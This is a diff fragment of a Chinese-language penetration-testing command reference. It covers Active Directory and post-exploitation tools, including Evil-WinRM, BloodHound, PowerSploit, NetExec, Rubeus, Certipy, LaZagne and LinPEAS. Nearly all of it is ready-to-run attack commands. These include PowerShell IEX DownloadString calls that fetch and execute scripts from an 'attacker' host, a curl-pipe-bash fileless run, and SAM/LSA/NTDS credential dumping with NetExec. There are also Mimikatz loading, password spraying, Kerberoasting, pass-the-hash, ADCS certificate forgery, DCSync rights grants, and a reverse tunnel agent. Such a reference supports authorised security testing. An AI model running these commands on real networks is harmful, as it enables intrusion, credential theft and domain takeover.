|
+
|
|
226
|
+
### Evil-WinRM `evil-winrm`
|
|
227
|
+
_WinRM远程管理工具_
|
|
228
|
+
|
|
229
|
+
**Step 0**
|
|
230
|
+
> 使用密码连接
|
|
231
|
+
_platform: linux_
|
|
232
|
+
```
|
|
233
|
+
evil-winrm -i target_ip -u user -p password
|
|
234
|
+
```
|
|
235
|
+
|
|
236
|
+
**Step 0**
|
|
237
|
+
> 使用哈希连接
|
|
238
|
+
_platform: linux_
|
|
239
|
+
```
|
|
240
|
+
evil-winrm -i target_ip -u user -H ntlm_hash
|
|
241
|
+
```
|
|
242
|
+
|
|
243
|
+
**Step 0**
|
|
244
|
+
> 上传文件到目标
|
|
245
|
+
_platform: linux_
|
|
246
|
+
```
|
|
247
|
+
upload local_file remote_path
|
|
248
|
+
```
|
|
249
|
+
|
|
250
|
+
**Step 0**
|
|
251
|
+
> 从目标下载文件
|
|
252
|
+
_platform: linux_
|
|
253
|
+
```
|
|
254
|
+
download remote_path local_file
|
|
255
|
+
```
|
|
256
|
+
|
|
257
|
+
**Step 0**
|
|
258
|
+
> 加载PowerShell脚本
|
|
259
|
+
_platform: linux_
|
|
260
|
+
```
|
|
261
|
+
menu
|
|
262
|
+
Bypass-4MSI
|
|
263
|
+
Invoke-Mimikatz
|
|
264
|
+
```
|
|
265
|
+
|
|
266
|
+
**Step 0**
|
|
267
|
+
> 执行PowerShell命令
|
|
268
|
+
_platform: linux_
|
|
269
|
+
```
|
|
270
|
+
Invoke-Command -ScriptBlock {whoami}
|
|
271
|
+
```
|
|
272
|
+
|
|
273
|
+
---
|
|
274
|
+
|
|
275
|
+
### ProxyChains `proxychains`
|
|
276
|
+
_代理链工具_
|
|
277
|
+
|
|
278
|
+
**Step 0**
|
|
279
|
+
> 配置SOCKS代理
|
|
280
|
+
_platform: linux_
|
|
281
|
+
```
|
|
282
|
+
vim /etc/proxychains4.conf
|
|
283
|
+
[ProxyList]
|
|
284
|
+
socks5 127.0.0.1 1080
|
|
285
|
+
```
|
|
286
|
+
|
|
287
|
+
**Step 0**
|
|
288
|
+
> 通过代理运行工具
|
|
289
|
+
_platform: linux_
|
|
290
|
+
```
|
|
291
|
+
proxychains4 nmap -sT -Pn target_ip
|
|
292
|
+
```
|
|
293
|
+
|
|
294
|
+
**Step 0**
|
|
295
|
+
> 动态代理链
|
|
296
|
+
_platform: linux_
|
|
297
|
+
```
|
|
298
|
+
dynamic_chain
|
|
299
|
+
[ProxyList]
|
|
300
|
+
socks5 127.0.0.1 1080
|
|
301
|
+
socks5 127.0.0.1 1081
|
|
302
|
+
```
|
|
303
|
+
|
|
304
|
+
**Step 0**
|
|
305
|
+
> 严格按顺序使用代理
|
|
306
|
+
_platform: linux_
|
|
307
|
+
```
|
|
308
|
+
strict_chain
|
|
309
|
+
```
|
|
310
|
+
|
|
311
|
+
**Step 0**
|
|
312
|
+
> 随机选择代理
|
|
313
|
+
_platform: linux_
|
|
314
|
+
```
|
|
315
|
+
random_chain
|
|
316
|
+
```
|
|
317
|
+
|
|
318
|
+
---
|
|
319
|
+
|
|
320
|
+
### BloodHound `bloodhound-tool`
|
|
321
|
+
_Active Directory关系分析工具_
|
|
322
|
+
|
|
323
|
+
**Step 0**
|
|
324
|
+
> 启动Neo4j数据库
|
|
325
|
+
_platform: linux_
|
|
326
|
+
```
|
|
327
|
+
sudo neo4j console
|
|
328
|
+
```
|
|
329
|
+
|
|
330
|
+
**Step 0**
|
|
331
|
+
> 启动BloodHound界面
|
|
332
|
+
_platform: linux_
|
|
333
|
+
```
|
|
334
|
+
bloodhound
|
|
335
|
+
```
|
|
336
|
+
|
|
337
|
+
**Step 0**
|
|
338
|
+
> 采集所有域信息
|
|
339
|
+
_platform: windows_
|
|
340
|
+
```
|
|
341
|
+
SharpHound.exe -c All
|
|
342
|
+
```
|
|
343
|
+
|
|
344
|
+
**Step 0**
|
|
345
|
+
> PowerShell远程加载采集
|
|
346
|
+
_platform: windows_
|
|
347
|
+
```
|
|
348
|
+
IEX(New-Object Net.WebClient).DownloadString("http://attacker/SharpHound.ps1"); Invoke-BloodHound -CollectionMethod All # security-allowlist: SEC005
|
|
349
|
+
```
|
|
350
|
+
|
|
351
|
+
**Step 0**
|
|
352
|
+
> Python版本采集
|
|
353
|
+
_platform: linux_
|
|
354
|
+
```
|
|
355
|
+
bloodhound-python -u user -p password -d domain.com -ns dc_ip
|
|
356
|
+
```
|
|
357
|
+
|
|
358
|
+
**Step 0**
|
|
359
|
+
> 查询到域管理员的最短路径
|
|
360
|
+
```
|
|
361
|
+
MATCH p=shortestPath((n:User)-[*1..]->(m:Group)) WHERE m.name="DOMAIN ADMINS@DOMAIN.COM" RETURN p
|
|
362
|
+
```
|
|
363
|
+
|
|
364
|
+
**Step 0**
|
|
365
|
+
> 查询DCSync权限关系
|
|
366
|
+
```
|
|
367
|
+
MATCH (n)-[r:DCSync]->(m) RETURN n,m
|
|
368
|
+
```
|
|
369
|
+
|
|
370
|
+
**Step 0**
|
|
371
|
+
> 查询无约束委派计算机
|
|
372
|
+
```
|
|
373
|
+
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
|
|
374
|
+
```
|
|
375
|
+
|
|
376
|
+
**Step 0**
|
|
377
|
+
> 查询高权限用户
|
|
378
|
+
```
|
|
379
|
+
MATCH (n:User) WHERE n.admincount=true RETURN n
|
|
380
|
+
```
|
|
381
|
+
|
|
382
|
+
---
|
|
383
|
+
|
|
384
|
+
### SharpHound `sharphound-tool`
|
|
385
|
+
_BloodHound数据采集器_
|
|
386
|
+
|
|
387
|
+
**Step 0**
|
|
388
|
+
> 采集所有数据
|
|
389
|
+
_platform: windows_
|
|
390
|
+
```
|
|
391
|
+
SharpHound.exe -c All
|
|
392
|
+
```
|
|
393
|
+
|
|
394
|
+
**Step 0**
|
|
395
|
+
> 指定域控制器
|
|
396
|
+
_platform: windows_
|
|
397
|
+
```
|
|
398
|
+
SharpHound.exe -c All --LdapUsername user --LdapPassword pass --DomainController dc.domain.com
|
|
399
|
+
```
|
|
400
|
+
|
|
401
|
+
**Step 0**
|
|
402
|
+
> 指定域名
|
|
403
|
+
_platform: windows_
|
|
404
|
+
```
|
|
405
|
+
SharpHound.exe -c All --Domain domain.com
|
|
406
|
+
```
|
|
407
|
+
|
|
408
|
+
**Step 0**
|
|
409
|
+
> 随机文件名隐蔽采集
|
|
410
|
+
_platform: windows_
|
|
411
|
+
```
|
|
412
|
+
SharpHound.exe -c All --RandomizeFilenames --OutputDirectory C:\Users\Public
|
|
413
|
+
```
|
|
414
|
+
|
|
415
|
+
**Step 0**
|
|
416
|
+
> 指定采集方法
|
|
417
|
+
_platform: windows_
|
|
418
|
+
```
|
|
419
|
+
SharpHound.exe -c Default,ACL,Trusts,Container
|
|
420
|
+
```
|
|
421
|
+
|
|
422
|
+
---
|
|
423
|
+
|
|
424
|
+
### SharpSMBClient `sharpsmbclient-tool`
|
|
425
|
+
_SMB客户端工具_
|
|
426
|
+
|
|
427
|
+
**Step 0**
|
|
428
|
+
> 列出SMB共享
|
|
429
|
+
_platform: windows_
|
|
430
|
+
```
|
|
431
|
+
SharpSMBClient.exe -d domain -u user -p password -i target_ip -L
|
|
432
|
+
```
|
|
433
|
+
|
|
434
|
+
**Step 0**
|
|
435
|
+
> 列出共享目录
|
|
436
|
+
_platform: windows_
|
|
437
|
+
```
|
|
438
|
+
SharpSMBClient.exe -d domain -u user -p password -i target_ip -s C$ -l
|
|
439
|
+
```
|
|
440
|
+
|
|
441
|
+
**Step 0**
|
|
442
|
+
> 下载文件
|
|
443
|
+
_platform: windows_
|
|
444
|
+
```
|
|
445
|
+
SharpSMBClient.exe -d domain -u user -p password -i target_ip -s C$ -g "path\file"
|
|
446
|
+
```
|
|
447
|
+
|
|
448
|
+
**Step 0**
|
|
449
|
+
> 上传文件
|
|
450
|
+
_platform: windows_
|
|
451
|
+
```
|
|
452
|
+
SharpSMBClient.exe -d domain -u user -p password -i target_ip -s C$ -p local_file -r remote_path
|
|
453
|
+
```
|
|
454
|
+
|
|
455
|
+
---
|
|
456
|
+
|
|
457
|
+
### PowerSploit `powersploit-tool`
|
|
458
|
+
_PowerShell渗透测试框架_
|
|
459
|
+
|
|
460
|
+
**Step 0**
|
|
461
|
+
> 远程加载PowerView
|
|
462
|
+
_platform: windows_
|
|
463
|
+
```
|
|
464
|
+
IEX(New-Object Net.WebClient).DownloadString("http://attacker/PowerView.ps1") # security-allowlist: SEC005
|
|
465
|
+
```
|
|
466
|
+
|
|
467
|
+
**Step 0**
|
|
468
|
+
> 获取域信息
|
|
469
|
+
_platform: windows_
|
|
470
|
+
```
|
|
471
|
+
Get-NetDomain
|
|
472
|
+
```
|
|
473
|
+
|
|
474
|
+
**Step 0**
|
|
475
|
+
> 获取域用户
|
|
476
|
+
_platform: windows_
|
|
477
|
+
```
|
|
478
|
+
Get-NetUser
|
|
479
|
+
```
|
|
480
|
+
|
|
481
|
+
**Step 0**
|
|
482
|
+
> 获取域管理员
|
|
483
|
+
_platform: windows_
|
|
484
|
+
```
|
|
485
|
+
Get-NetGroup "Domain Admins"
|
|
486
|
+
```
|
|
487
|
+
|
|
488
|
+
**Step 0**
|
|
489
|
+
> 获取域控制器
|
|
490
|
+
_platform: windows_
|
|
491
|
+
```
|
|
492
|
+
Get-NetDomainController
|
|
493
|
+
```
|
|
494
|
+
|
|
495
|
+
**Step 0**
|
|
496
|
+
> 查找域管理员登录位置
|
|
497
|
+
_platform: windows_
|
|
498
|
+
```
|
|
499
|
+
Find-DomainUserLocation
|
|
500
|
+
```
|
|
501
|
+
|
|
502
|
+
**Step 0**
|
|
503
|
+
> 获取对象ACL
|
|
504
|
+
_platform: windows_
|
|
505
|
+
```
|
|
506
|
+
Get-ObjectAcl -SamAccountName target
|
|
507
|
+
```
|
|
508
|
+
|
|
509
|
+
**Step 0**
|
|
510
|
+
> 添加DCSync权限
|
|
511
|
+
_platform: windows_
|
|
512
|
+
```
|
|
513
|
+
Add-DomainObjectAcl -TargetIdentity target -Rights DCSync
|
|
514
|
+
```
|
|
515
|
+
|
|
516
|
+
---
|
|
517
|
+
|
|
518
|
+
### NetExec `netexec`
|
|
519
|
+
_CrackMapExec的继任者,网络渗透测试自动化工具_
|
|
520
|
+
|
|
521
|
+
**Step 0**
|
|
522
|
+
> SMB共享和用户枚举
|
|
523
|
+
```
|
|
524
|
+
nxc smb 10.0.0.0/24 -u user -p password --shares
|
|
525
|
+
nxc smb 10.0.0.0/24 -u user -p password --users
|
|
526
|
+
```
|
|
527
|
+
**语法解析:**
|
|
528
|
+
- `nxc` — NetExec命令行工具 _command_
|
|
529
|
+
- `smb` — 指定SMB协议 _parameter_
|
|
530
|
+
- `--shares` — 枚举共享目录 _parameter_
|
|
531
|
+
|
|
532
|
+
**Step 0**
|
|
533
|
+
> 使用单一密码对多用户进行喷射
|
|
534
|
+
```
|
|
535
|
+
nxc smb 10.0.0.0/24 -u users.txt -p "Password123!" --continue-on-success
|
|
536
|
+
```
|
|
537
|
+
|
|
538
|
+
**Step 0**
|
|
539
|
+
> 通过SMB/WinRM执行命令
|
|
540
|
+
```
|
|
541
|
+
nxc smb target_ip -u admin -p password -x "whoami"
|
|
542
|
+
nxc winrm target_ip -u admin -p password -X "Get-Process"
|
|
543
|
+
```
|
|
544
|
+
|
|
545
|
+
**Step 0**
|
|
546
|
+
> 提取SAM/LSA/NTDS中的凭证
|
|
547
|
+
```
|
|
548
|
+
nxc smb target_ip -u admin -p password --sam
|
|
549
|
+
nxc smb target_ip -u admin -p password --lsa
|
|
550
|
+
nxc smb target_ip -u admin -p password --ntds
|
|
551
|
+
```
|
|
552
|
+
|
|
553
|
+
---
|
|
554
|
+
|
|
555
|
+
### Ligolo-ng `ligolo-ng`
|
|
556
|
+
_高级内网隧道代理工具,基于TUN接口_
|
|
557
|
+
|
|
558
|
+
**Step 0**
|
|
559
|
+
> 在攻击机上配置TUN接口和启动代理
|
|
560
|
+
_platform: linux_
|
|
561
|
+
```
|
|
562
|
+
# 创建TUN接口
|
|
563
|
+
sudo ip tuntap add user $(whoami) mode tun ligolo
|
|
564
|
+
sudo ip link set ligolo up
|
|
565
|
+
|
|
566
|
+
# 启动代理服务
|
|
567
|
+
./proxy -selfcert -laddr 0.0.0.0:11601
|
|
568
|
+
```
|
|
569
|
+
**语法解析:**
|
|
570
|
+
- `ip tuntap add` — 创建TUN虚拟网络接口 _command_
|
|
571
|
+
- `-selfcert` — 使用自签名证书 _parameter_
|
|
572
|
+
|
|
573
|
+
**Step 0**
|
|
574
|
+
> 在目标机运行Agent连接回攻击机
|
|
575
|
+
```
|
|
576
|
+
./agent -connect attacker_ip:11601 -ignore-cert
|
|
577
|
+
```
|
|
578
|
+
|
|
579
|
+
**Step 0**
|
|
580
|
+
> 配置路由实现内网直通
|
|
581
|
+
_platform: linux_
|
|
582
|
+
```
|
|
583
|
+
# 在Ligolo控制台:
|
|
584
|
+
session
|
|
585
|
+
start
|
|
586
|
+
# 在攻击机添加路由:
|
|
587
|
+
sudo ip route add 10.10.10.0/24 dev ligolo
|
|
588
|
+
```
|
|
589
|
+
|
|
590
|
+
---
|
|
591
|
+
|
|
592
|
+
### SharpHound `sharphound`
|
|
593
|
+
_BloodHound的C#数据收集器,在Windows域内收集AD信息_
|
|
594
|
+
|
|
595
|
+
**Step 0**
|
|
596
|
+
> 收集所有AD域信息(用户/组/ACL/Session等)
|
|
597
|
+
_platform: windows_
|
|
598
|
+
```
|
|
599
|
+
.\SharpHound.exe -c All
|
|
600
|
+
```
|
|
601
|
+
**语法解析:**
|
|
602
|
+
- `-c All` — 收集所有类型的数据 _parameter_
|
|
603
|
+
|
|
604
|
+
**Step 0**
|
|
605
|
+
> 仅从DC收集,不保存缓存,随机文件名
|
|
606
|
+
_platform: windows_
|
|
607
|
+
```
|
|
608
|
+
.\SharpHound.exe -c DCOnly --NoSaveCache --RandomFilenames --MemCache
|
|
609
|
+
```
|
|
610
|
+
|
|
611
|
+
**Step 0**
|
|
612
|
+
> 循环收集Session信息(2小时,每5分钟一次)
|
|
613
|
+
_platform: windows_
|
|
614
|
+
```
|
|
615
|
+
.\SharpHound.exe -c Session --Loop --LoopDuration 02:00:00 --LoopInterval 00:05:00
|
|
616
|
+
```
|
|
617
|
+
|
|
618
|
+
**Step 0**
|
|
619
|
+
> 收集指定子域的信息
|
|
620
|
+
_platform: windows_
|
|
621
|
+
```
|
|
622
|
+
.\SharpHound.exe -c All -d child.domain.com --LdapUsername user --LdapPassword pass
|
|
623
|
+
```
|
|
624
|
+
|
|
625
|
+
---
|
|
626
|
+
|
|
627
|
+
### BloodHound-Python `bloodhound-python`
|
|
628
|
+
_BloodHound的Python数据收集器,可从Linux远程收集AD信息_
|
|
629
|
+
|
|
630
|
+
**Step 0**
|
|
631
|
+
> 从Linux远程收集AD域全量信息
|
|
632
|
+
_platform: linux_
|
|
633
|
+
```
|
|
634
|
+
bloodhound-python -d domain.com -u user -p password -ns dc_ip -c All
|
|
635
|
+
```
|
|
636
|
+
**语法解析:**
|
|
637
|
+
- `-d` — 目标域名 _parameter_
|
|
638
|
+
- `-ns` — DNS服务器(通常是DC) _parameter_
|
|
639
|
+
- `-c All` — 收集所有类型数据 _parameter_
|
|
640
|
+
|
|
641
|
+
**Step 0**
|
|
642
|
+
> 使用NTLM哈希进行Pass-the-Hash收集
|
|
643
|
+
_platform: linux_
|
|
644
|
+
```
|
|
645
|
+
bloodhound-python -d domain.com -u user --hashes aad3b435b51404eeaad3b435b51404ee:ntlm_hash -ns dc_ip -c All
|
|
646
|
+
```
|
|
647
|
+
|
|
648
|
+
**Step 0**
|
|
649
|
+
> 仅收集组、本地管理员和会话信息
|
|
650
|
+
_platform: linux_
|
|
651
|
+
```
|
|
652
|
+
bloodhound-python -d domain.com -u user -p pass -ns dc_ip -c Group,LocalAdmin,Session
|
|
653
|
+
```
|
|
654
|
+
|
|
655
|
+
---
|
|
656
|
+
|
|
657
|
+
### Rubeus `rubeus`
|
|
658
|
+
_Kerberos攻击工具集,用于票据操作和Kerberos攻击_
|
|
659
|
+
|
|
660
|
+
**Step 0**
|
|
661
|
+
> 请求服务票据用于离线破解
|
|
662
|
+
_platform: windows_
|
|
663
|
+
```
|
|
664
|
+
Rubeus.exe kerberoast /outfile:hashes.txt
|
|
665
|
+
Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt
|
|
666
|
+
```
|
|
667
|
+
**语法解析:**
|
|
668
|
+
- `kerberoast` — 请求TGS票据进行离线破解 _command_
|
|
669
|
+
- `/outfile` — 保存哈希到文件 _parameter_
|
|
670
|
+
|
|
671
|
+
**Step 0**
|
|
672
|
+
> 对不需要预认证的账户请求AS-REP
|
|
673
|
+
_platform: windows_
|
|
674
|
+
```
|
|
675
|
+
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
|
|
676
|
+
```
|
|
677
|
+
|
|
678
|
+
**Step 0**
|
|
679
|
+
> 导入Kerberos票据
|
|
680
|
+
_platform: windows_
|
|
681
|
+
```
|
|
682
|
+
Rubeus.exe ptt /ticket:base64_ticket
|
|
683
|
+
Rubeus.exe ptt /ticket:ticket.kirbi
|
|
684
|
+
```
|
|
685
|
+
|
|
686
|
+
**Step 0**
|
|
687
|
+
> 使用密码或哈希请求TGT票据
|
|
688
|
+
_platform: windows_
|
|
689
|
+
```
|
|
690
|
+
Rubeus.exe asktgt /user:user /password:pass /enctype:aes256 /ptt
|
|
691
|
+
Rubeus.exe asktgt /user:user /rc4:ntlm_hash /ptt
|
|
692
|
+
```
|
|
693
|
+
|
|
694
|
+
**Step 0**
|
|
695
|
+
> S4U约束委派攻击
|
|
696
|
+
_platform: windows_
|
|
697
|
+
```
|
|
698
|
+
Rubeus.exe s4u /user:svc$ /rc4:hash /impersonateuser:admin /msdsspn:cifs/target /ptt
|
|
699
|
+
```
|
|
700
|
+
|
|
701
|
+
---
|
|
702
|
+
|
|
703
|
+
### Certipy `certipy`
|
|
704
|
+
_AD CS(Active Directory证书服务)攻击工具_
|
|
705
|
+
|
|
706
|
+
**Step 0**
|
|
707
|
+
> 枚举可利用的证书模板
|
|
708
|
+
```
|
|
709
|
+
certipy find -u user@domain.com -p password -dc-ip dc_ip -enabled -vulnerable
|
|
710
|
+
```
|
|
711
|
+
**语法解析:**
|
|
712
|
+
- `find` — 枚举模式 _command_
|
|
713
|
+
- `-vulnerable` — 仅显示可利用的模板 _parameter_
|
|
714
|
+
|
|
715
|
+
**Step 0**
|
|
716
|
+
> ESC1: 利用允许SAN的模板伪造管理员证书
|
|
717
|
+
```
|
|
718
|
+
certipy req -u user@domain.com -p password -ca CA-NAME -template VULN_TEMPLATE -upn admin@domain.com
|
|
719
|
+
```
|
|
720
|
+
|
|
721
|
+
**Step 0**
|
|
722
|
+
> 使用证书进行PKINIT认证获取NT Hash
|
|
723
|
+
```
|
|
724
|
+
certipy auth -pfx admin.pfx -dc-ip dc_ip
|
|
725
|
+
```
|
|
726
|
+
|
|
727
|
+
**Step 0**
|
|
728
|
+
> Shadow Credentials攻击获取目标用户凭证
|
|
729
|
+
```
|
|
730
|
+
certipy shadow auto -u user@domain.com -p password -account target_user
|
|
731
|
+
```
|
|
732
|
+
|
|
733
|
+
---
|
|
734
|
+
|
|
735
|
+
### LaZagne `lazagne-tool`
|
|
736
|
+
_自动化本地密码恢复工具,支持数十种应用_
|
|
737
|
+
|
|
738
|
+
**Step 0**
|
|
739
|
+
> 提取所有支持应用的密码
|
|
740
|
+
_platform: windows_
|
|
741
|
+
```
|
|
742
|
+
lazagne.exe all
|
|
743
|
+
```
|
|
744
|
+
**语法解析:**
|
|
745
|
+
- `all` — 搜索所有支持的应用程序 _parameter_
|
|
746
|
+
|
|
747
|
+
**Step 0**
|
|
748
|
+
> 仅提取指定类别的密码
|
|
749
|
+
_platform: windows_
|
|
750
|
+
```
|
|
751
|
+
lazagne.exe browsers
|
|
752
|
+
lazagne.exe wifi
|
|
753
|
+
lazagne.exe databases
|
|
754
|
+
lazagne.exe sysadmin
|
|
755
|
+
```
|
|
756
|
+
|
|
757
|
+
**Step 0**
|
|
758
|
+
> Linux版本使用方式
|
|
759
|
+
_platform: linux_
|
|
760
|
+
```
|
|
761
|
+
python3 lazagne.py all
|
|
762
|
+
python3 lazagne.py browsers
|
|
763
|
+
```
|
|
764
|
+
|
|
765
|
+
---
|
|
766
|
+
|
|
767
|
+
### Seatbelt `seatbelt`
|
|
768
|
+
_C#安全审计工具,快速收集Windows系统安全相关信息_
|
|
769
|
+
|
|
770
|
+
**Step 0**
|
|
771
|
+
> 执行所有安全检查
|
|
772
|
+
_platform: windows_
|
|
773
|
+
```
|
|
774
|
+
Seatbelt.exe -group=all -full
|
|
775
|
+
```
|
|
776
|
+
**语法解析:**
|
|
777
|
+
- `-group=all` — 运行所有检查组 _parameter_
|
|
778
|
+
- `-full` — 详细输出模式 _parameter_
|
|
779
|
+
|
|
780
|
+
**Step 0**
|
|
781
|
+
> 检查系统和用户相关安全配置
|
|
782
|
+
_platform: windows_
|
|
783
|
+
```
|
|
784
|
+
Seatbelt.exe -group=system -group=user
|
|
785
|
+
```
|
|
786
|
+
|
|
787
|
+
**Step 0**
|
|
788
|
+
> 运行指定的检查模块
|
|
789
|
+
_platform: windows_
|
|
790
|
+
```
|
|
791
|
+
Seatbelt.exe CredEnum WindowsVault SavedRDPConnections RecentFiles
|
|
792
|
+
```
|
|
793
|
+
|
|
794
|
+
**Step 0**
|
|
795
|
+
> 远程执行安全审计
|
|
796
|
+
_platform: windows_
|
|
797
|
+
```
|
|
798
|
+
Seatbelt.exe -group=remote -computername=target -username=admin -password=pass
|
|
799
|
+
```
|
|
800
|
+
|
|
801
|
+
---
|
|
802
|
+
|
|
803
|
+
### WinPEAS `winpeas`
|
|
804
|
+
_Windows权限提升辅助脚本,自动发现提权路径_
|
|
805
|
+
|
|
806
|
+
**Step 0**
|
|
807
|
+
> 执行所有Windows提权检查
|
|
808
|
+
_platform: windows_
|
|
809
|
+
```
|
|
810
|
+
winpeasany.exe
|
|
811
|
+
```
|
|
812
|
+
|
|
813
|
+
**Step 0**
|
|
814
|
+
> 快速模式(跳过耗时检查)
|
|
815
|
+
_platform: windows_
|
|
816
|
+
```
|
|
817
|
+
winpeasany.exe fast
|
|
818
|
+
```
|
|
819
|
+
|
|
820
|
+
**Step 0**
|
|
821
|
+
> 仅检查指定类别
|
|
822
|
+
_platform: windows_
|
|
823
|
+
```
|
|
824
|
+
winpeasany.exe servicesinfo
|
|
825
|
+
winpeasany.exe userinfo
|
|
826
|
+
winpeasany.exe systeminfo
|
|
827
|
+
```
|
|
828
|
+
|
|
829
|
+
**Step 0**
|
|
830
|
+
> 将结果保存到文件
|
|
831
|
+
_platform: windows_
|
|
832
|
+
```
|
|
833
|
+
winpeasany.exe log=output.txt
|
|
834
|
+
winpeasany.exe /quiet > output.txt 2>&1
|
|
835
|
+
```
|
|
836
|
+
|
|
837
|
+
---
|
|
838
|
+
|
|
839
|
+
### LinPEAS `linpeas`
|
|
840
|
+
_Linux权限提升辅助脚本,自动发现提权路径_
|
|
841
|
+
|
|
842
|
+
**Step 0**
|
|
843
|
+
> 执行所有Linux提权检查
|
|
844
|
+
_platform: linux_
|
|
845
|
+
```
|
|
846
|
+
./linpeas.sh
|
|
847
|
+
```
|
|
848
|
+
|
|
849
|
+
**Step 0**
|
|
850
|
+
> 全面扫描(含耗时检查)并输出到文件
|
|
851
|
+
_platform: linux_
|
|
852
|
+
```
|
|
853
|
+
./linpeas.sh -a -o output.txt
|
|
854
|
+
```
|
|
855
|
+
|
|
856
|
+
**Step 0**
|
|
857
|
+
> 无文件落地直接执行
|
|
858
|
+
_platform: linux_
|
|
859
|
+
```
|
|
860
|
+
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash # security-allowlist: curl-pipe-bash
|
|
861
|
+
```
|
|
862
|
+
|
|
863
|
+
**Step 0**
|
|
864
|
+
> 指定检查类别
|
|
865
|
+
_platform: linux_
|
|
866
|
+
```
|
|
867
|
+
./linpeas.sh -s
|
|
868
|
+
# -s: 仅超快速检查
|
|
869
|
+
# -P: 仅密码相关
|
|
870
|
+
# -n: 仅网络信息
|
|
871
|
+
```
|
|
872
|
+
|
|
873
|
+
---
|